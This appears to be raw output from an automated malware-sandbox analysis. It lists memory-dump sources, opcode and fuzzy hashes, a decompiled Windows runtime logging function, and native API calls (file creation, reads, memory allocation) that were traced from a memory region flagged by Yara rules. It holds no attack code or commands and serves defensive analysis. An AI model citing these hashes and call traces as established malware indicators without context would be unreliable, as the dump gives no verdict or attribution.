                                                                      • Opcode ID: 2a7f46d7302cabe12c496e62e4a75e6fc6b712bb6ca848be3e40b21f337bc3b6
                                                                      • Instruction ID: f6818e4314cfec70c0b3be81c446aa19f707836979d00ed79c70e6b3cf547176
                                                                      • Opcode Fuzzy Hash: 2a7f46d7302cabe12c496e62e4a75e6fc6b712bb6ca848be3e40b21f337bc3b6
                                                                      • Instruction Fuzzy Hash: A590027128100402D545719955046060009B7D0281F91C016A0415558EC7958A56BAA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8b3838b47274f939366e52d890024e86d5238392d80bdd59f05eabb6b7ed6819
                                                                      • Instruction ID: 48f72291bd47a6236f837abca1c6911be6e561f5d5ee0563ef047bbe89e12174
                                                                      • Opcode Fuzzy Hash: 8b3838b47274f939366e52d890024e86d5238392d80bdd59f05eabb6b7ed6819
                                                                      • Instruction Fuzzy Hash: EE9002A1641140434944B19959044065015B7E1341791C125A0445564CC7A88855A2A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 56cef16fdbff9e42f3052f800f1a3bc39273b7bf3d2d43edb75fe79a58e19244
                                                                      • Instruction ID: e27e2357a021aa2a80f6ee0ae1436ecc844a52a35cabad9aa1bfe7d2d49487a0
                                                                      • Opcode Fuzzy Hash: 56cef16fdbff9e42f3052f800f1a3bc39273b7bf3d2d43edb75fe79a58e19244
                                                                      • Instruction Fuzzy Hash: 1390026134100402D506619955146060009E7D1385F91C016E1415559DC7658953B172
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94e7e7871b156ff46a203bff801081834d769c396dac28d12109688bf7c80c68
                                                                      • Instruction ID: 3a661b3a0145260d5b5d1d2b0d718a0e58dda21d43310d5ad3cbcf551063f59d
                                                                      • Opcode Fuzzy Hash: 94e7e7871b156ff46a203bff801081834d769c396dac28d12109688bf7c80c68
                                                                      • Instruction Fuzzy Hash: FD900271341000529904A6D96904A4A4105A7F0341F51D019A4005558CC69488616161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 246c99ac0542c8a09bc136200189124657144ecef56f6efb79bc912435ab559f
                                                                      • Instruction ID: 92b04221e0a5ef825a983e7ae866656348ad970977538b6300c84dcd6c87de64
                                                                      • Opcode Fuzzy Hash: 246c99ac0542c8a09bc136200189124657144ecef56f6efb79bc912435ab559f
                                                                      • Instruction Fuzzy Hash: D490026128100802D544719995147070006E7D0641F51C015A0015558DC756896576F1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 390670f030436800f7239e0744d8a20b981fd898e5149b1fa297d31750211b88
                                                                      • Instruction ID: 040399c1ed7f34b89299abe46ba7811f7727afdd5a455fb02f3cc38a3792b659
                                                                      • Opcode Fuzzy Hash: 390670f030436800f7239e0744d8a20b981fd898e5149b1fa297d31750211b88
                                                                      • Instruction Fuzzy Hash: 1B90026164500402D544719965187060015A7D0241F51D015A0015558DC7998A5576E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5d4e3eb97485acf28f38fe391e377d42013a418a02277d9959c4bea2cb9d7cc0
                                                                      • Instruction ID: cb70ee12420490c36a09032f0ca95e8d4ed0977812a75c586cb74653c3a9c695
                                                                      • Opcode Fuzzy Hash: 5d4e3eb97485acf28f38fe391e377d42013a418a02277d9959c4bea2cb9d7cc0
                                                                      • Instruction Fuzzy Hash: 6790026124504442D50465996508A060005A7D0245F51D015A1055599DC7758851B171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f83450572ed9f52dfa1281d0b3a141cceb2e2a751e7240d66c44e179b72c86c9
                                                                      • Instruction ID: d66866f924986a3a418ac1b71130007ab7e64b0a3f4c853294129f8493aec164
                                                                      • Opcode Fuzzy Hash: f83450572ed9f52dfa1281d0b3a141cceb2e2a751e7240d66c44e179b72c86c9
                                                                      • Instruction Fuzzy Hash: 7190027524504442D90465996904A870005A7D0345F51D415A041559CDC7948861B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39b5bdd5144a1506e1c24e92e039641c761e29d7792f979d7b05af5cf76ddb03
                                                                      • Instruction ID: 5eccd1eba3adcd7963201d98195956a787dfc1e6262d8692a727347fde77680b
                                                                      • Opcode Fuzzy Hash: 39b5bdd5144a1506e1c24e92e039641c761e29d7792f979d7b05af5cf76ddb03
                                                                      • Instruction Fuzzy Hash: D090047134100403D50471DD770C7070005F7D0341F51D415F041555CDD7D7CC517171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f9acc37b0eb0cd23912c0527759243c783365914fcb0106fde3336451a60c04d
                                                                      • Instruction ID: f8348871e0a48cfe24953b4b83c3823087827e921cdd25ef3bf060f2006608aa
                                                                      • Opcode Fuzzy Hash: f9acc37b0eb0cd23912c0527759243c783365914fcb0106fde3336451a60c04d
                                                                      • Instruction Fuzzy Hash: 7C90027124144002D5447199954460B5005B7E0341F51C415E0416558CC7558856A261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ed96676501e61523cc659fb9af5912821cfad1e9cdd9c3ff3455ac7aee91dae5
                                                                      • Instruction ID: b26de870d799aafacbf892f052afa66d27eee1fcf1b21286a5de871ea2dfdee1
                                                                      • Opcode Fuzzy Hash: ed96676501e61523cc659fb9af5912821cfad1e9cdd9c3ff3455ac7aee91dae5
                                                                      • Instruction Fuzzy Hash: 4F90027164500802D554719955147460005A7D0341F51C015A0015658DC7958A5576E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9e71fb596d65131299260696d346a0744cd69dff02ce0a1a68379994aca53ac0
                                                                      • Instruction ID: b463b435c5bd2f877f4d591aea3984d956c0474211c13464861f7a0752c1281e
                                                                      • Opcode Fuzzy Hash: 9e71fb596d65131299260696d346a0744cd69dff02ce0a1a68379994aca53ac0
                                                                      • Instruction Fuzzy Hash: D290027124140402D504619959087470005A7D0342F51C015A5155559EC7A5C8917571
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ce6397b50b30560440d733af7066bac7bfb90800e16aed80292fadb303fbb09c
                                                                      • Instruction ID: 31730fbeef25bc0e724a6bb05089a6c70332eb4da294c5579d699b330aec7911
                                                                      • Opcode Fuzzy Hash: ce6397b50b30560440d733af7066bac7bfb90800e16aed80292fadb303fbb09c
                                                                      • Instruction Fuzzy Hash: B190027124504842D54471995504A460015A7D0345F51C015A0055698DD7658D55B6A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bc2a36541a161280d524010800efce612fab3360a853c493b63bb0a9e565391
                                                                      • Instruction ID: 85ed10b15ff8a91b3fe92fa3ffdf8d74eb72979528d68420e87cfa1ca7015bbf
                                                                      • Opcode Fuzzy Hash: 5bc2a36541a161280d524010800efce612fab3360a853c493b63bb0a9e565391
                                                                      • Instruction Fuzzy Hash: D590026124144442D54462995904B0F4105A7E1242F91C01DA4147558CCA5588556761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e26fc1c57eb760df9e2c9327c963196fe4623da6a3e95da66ccd8c65bb79452
                                                                      • Instruction ID: 8d9af92ae2c60c1a349468b36b2545c04966583788d9bc11596a77a3c961ff6e
                                                                      • Opcode Fuzzy Hash: 3e26fc1c57eb760df9e2c9327c963196fe4623da6a3e95da66ccd8c65bb79452
                                                                      • Instruction Fuzzy Hash: 9F90027124100842D50461995504B460005A7E0341F51C01AA0115658DC755C8517561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: 6a3706ca00d5f63102f6378c96c31dcf22ea98fb9a6b2c81f3e956e66eed58ac
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E0121FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                      				void* _t7;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				intOrPtr _t14;
                                                                      				intOrPtr* _t15;
                                                                      
                                                                      				_t13 = __edx;
                                                                      				_push(_a4);
                                                                      				_t14 =  *[fs:0x18];
                                                                      				_t15 = _t12;
                                                                      				_t7 = E011CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                      				_push(_t13);
                                                                      				E01215720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                      				_t9 =  *_t15;
                                                                      				if(_t9 == 0xffffffff) {
                                                                      					_t10 = 0;
                                                                      				} else {
                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                      				}
                                                                      				_push(_t10);
                                                                      				_push(_t15);
                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                      				return E01215720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                      			}

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0121FDFA
                                                                      Strings
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0121FE2B
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0121FE01
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: 14cf4a6613b31e2847edbe9a2c2dbeaa0f37a210726f1719694959e105cbad4a
                                                                      • Instruction ID: 4b4af4a0c51a7347fe6213789be628d10f964be156f49b4641c0ddac32b7732a
                                                                      • Opcode Fuzzy Hash: 14cf4a6613b31e2847edbe9a2c2dbeaa0f37a210726f1719694959e105cbad4a
                                                                      • Instruction Fuzzy Hash: C1F0F632210202BFE7295A45DC02F33BFABEBA5B30F140318F628561D1DA62F86196F0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      • NtClose.NTDLL(@==,?,?,003D3D40,00000000,FFFFFFFF), ref: 003D8705
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID: @==$m;=
                                                                      • API String ID: 3535843008-867631472
                                                                      • Opcode ID: 6cf120370936278f00b116b0e8d1e9d7e862436aff26ade48e795f4217cb668d
                                                                      • Instruction ID: 9d36244a89285c4474d97fde13731b1630481432209574ad9c8e7790d566bbc4
                                                                      • Opcode Fuzzy Hash: 6cf120370936278f00b116b0e8d1e9d7e862436aff26ade48e795f4217cb668d
                                                                      • Instruction Fuzzy Hash: 74E092722401146BDB10EBE8AC85EEB7B68DF84764F11456AFA1CAB242C931E2118AE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,003D3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,003D3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 003D85FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: dac9615a8c8aa45dcc6329a0831157119820a3bd4bf830656e873f0e7c655f8d
                                                                      • Instruction ID: 2dd8f3093b95729fd73ba0fe1948981041fb85bc6a12b78873026f344fd0a502
                                                                      • Opcode Fuzzy Hash: dac9615a8c8aa45dcc6329a0831157119820a3bd4bf830656e873f0e7c655f8d
                                                                      • Instruction Fuzzy Hash: 0501BDB6241209AFDB48DF88DC85EEB77A9AF8C354F158259FA1D97240D630E851CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,003D3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,003D3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 003D85FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction ID: ccbe7e435ddceb0b337b95d3ebfed836ed9083013059ff7dd4b3420e35775de8
                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction Fuzzy Hash: 5BF0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

APIs
• NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:=,FFFFFFFF,?,b==,?,00000000), ref: 003D86A5
Strings
Memory Dump Source
• Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
Yara matches
Similarity
• API ID: FileRead
• String ID: !:=
• API String ID: 2738559852-3138348973
• Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction ID: e86055898715c571a695b118aa9f4a4efae22036a702e3c4a7bf302ad2df178e
• Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction Fuzzy Hash: A0F0A4B2200209ABCB14DF89DC85EEB77ADAF8C754F158249BA1D97241DA30E811CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtClose.NTDLL(@==,?,?,003D3D40,00000000,FFFFFFFF), ref: 003D8705
Strings
Memory Dump Source
• Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
Yara matches
Similarity
• API ID: Close
• String ID: @==
• API String ID: 3535843008-3176878205
• Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction ID: 8e0ac57d5aff647e628782264995ff6ef1f6c012bd9a6becbf700cda34d8077f
• Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction Fuzzy Hash: BDD01776200214ABD711EB98DC89FA77BADEF48760F15449ABA189B342C930FA0086E0
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003C2D11,00002000,00003000,00000004), ref: 003D87C9
Memory Dump Source
• Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: c4e4b9dd1a2c52a4293bb07eac3b63051c2b6f278606460b7db1f56e15c6e855
• Instruction ID: f6138e8f2bf58eeb507eb1979ab1691012811e53f81a6150106e383ea253b31a
• Opcode Fuzzy Hash: c4e4b9dd1a2c52a4293bb07eac3b63051c2b6f278606460b7db1f56e15c6e855
• Instruction Fuzzy Hash: 4CF0F8B6200119AFCB24DF99DC85EEB77ADAF8C354F118249FA19A7341C631E911CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003C2D11,00002000,00003000,00000004), ref: 003D87C9
Memory Dump Source
• Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction ID: 6892dc58782d8c882749a13a3b1683d71a50fe9e08ff0f99ca5963e9e4c4f3b1
• Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction Fuzzy Hash: 20F015B2200209ABCB14DF89DC81EAB77ADAF88754F118149BE0897341C630F810CBE0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a8e6752e45476bb98f9f70c7d2c09372981ae2fdb66005fecfaba798bf2471e6
• Instruction ID: f47be414593438bc8030276eda64b02cf794416c05c428652b3b767b19db505c
• Opcode Fuzzy Hash: a8e6752e45476bb98f9f70c7d2c09372981ae2fdb66005fecfaba798bf2471e6
• Instruction Fuzzy Hash: B090027120100846D60071594504B47000697E4341F51C016B0114674D8655CC91B571
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: cbd6e4a5778540c79666b52c7de7822c19483422306119c326cb8837ff317d67
• Instruction ID: d307cfc31ee9eda51a2f64dae9331612e0f7b0c8540919f0fef11f18db377316
• Opcode Fuzzy Hash: cbd6e4a5778540c79666b52c7de7822c19483422306119c326cb8837ff317d67
• Instruction Fuzzy Hash: C190027120108806D6107159850474B000697D4341F55C411B4414678D86D58CD1B171
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6748da85309839fc6aa78836b20e807aa725095ecd5f45c55a6757dd45dca1d3
• Instruction ID: c24ed073b41be2e8206a50d62d9626849e8da38b388cfc039dd5da04fe45b01c
• Opcode Fuzzy Hash: 6748da85309839fc6aa78836b20e807aa725095ecd5f45c55a6757dd45dca1d3
• Instruction Fuzzy Hash: 5E90027121180046D70075694D14B07000697D4343F51C115B0144574CC9558CA1A571
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 2f3ba8ccc4850c290ab11ce1cecf3656d93379b222dac94dea7bc027662dc8c3
• Instruction ID: 25d0c3b02787b554525a078f77efd6f87cc5a2000c15bfed37971148f4861893
• Opcode Fuzzy Hash: 2f3ba8ccc4850c290ab11ce1cecf3656d93379b222dac94dea7bc027662dc8c3
• Instruction Fuzzy Hash: 8790027120504846D64071594504A47001697D4345F51C011B00546B4D96658D95F6B1
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ee7ac51846fb01494335e5a1a45d5d2cfecfecc0d54f7459a5392ab1f1f65181
• Instruction ID: 2c2623cbfb735e1543b7815d492b1ccad0c2ab2d53398b6e4998308f5dee63e1
• Opcode Fuzzy Hash: ee7ac51846fb01494335e5a1a45d5d2cfecfecc0d54f7459a5392ab1f1f65181
• Instruction Fuzzy Hash: 2990027120100806D6807159450464B000697D5341F91C015B0015674DCA558E99B7F1
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 480a870ff2165a296371c8292231ae5b196f2c50bd5a7e9021af88adb13fd165
• Instruction ID: b1e9e03ba6795b4d436a1e0ecf4606053cfaa12626222c9b013794f068545441
• Opcode Fuzzy Hash: 480a870ff2165a296371c8292231ae5b196f2c50bd5a7e9021af88adb13fd165
• Instruction Fuzzy Hash: E890027131114406D61071598504707000697D5241F51C411B0814578D86D58CD1B172
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 96f525b78561b8196390f9bf86545892f2867eff4457e3d4298ed59a40619cba
• Instruction ID: 0bcddb99649c39d91f8f9e19be8c208e179a48c70063f83fd29a270feef143b8
• Opcode Fuzzy Hash: 96f525b78561b8196390f9bf86545892f2867eff4457e3d4298ed59a40619cba
• Instruction Fuzzy Hash: 8090027921300006D6807159550860B000697D5242F91D415B0005578CC9558CA9A371
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a8a4034bc20a05923678877845a3bf3cce6abd5f59835ddd12657ac16c4721fe
• Instruction ID: b421e86dc169934b2d3748b10835b67c82b65724309654256bf224e347154ae1
• Opcode Fuzzy Hash: a8a4034bc20a05923678877845a3bf3cce6abd5f59835ddd12657ac16c4721fe
• Instruction Fuzzy Hash: C690027120100406D60075995508647000697E4341F51D011B5014575EC6A58CD1B171
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a14c6665ca376c54be70fbec507548380d37204908c67eebe531c864343407b2
• Instruction ID: fdab3419561007ab07cd23dd6d1f9ed55bc06fcb9d7e261f93592af42732d6d5
• Opcode Fuzzy Hash: a14c6665ca376c54be70fbec507548380d37204908c67eebe531c864343407b2
• Instruction Fuzzy Hash: 98900271242041565A45B15945045074007A7E4281791C012B1404970C85669C96E671
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e5b0b7521c6893f515e6f44a4f988327a4b30268a9b4d82294673e801ff9b44a
• Instruction ID: 04c2d164f849c9a2c039faf49e19c2f160c5b9412721350caf609b0805d153ec
• Opcode Fuzzy Hash: e5b0b7521c6893f515e6f44a4f988327a4b30268a9b4d82294673e801ff9b44a
• Instruction Fuzzy Hash: 6590027120100417D61171594604707000A97D4281F91C412B0414578D96968D92F171
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
• Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp
• Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a34d237501d9e6eb15f179212a829eefccdc60bf9004e0cb764b09a57fe5b91d
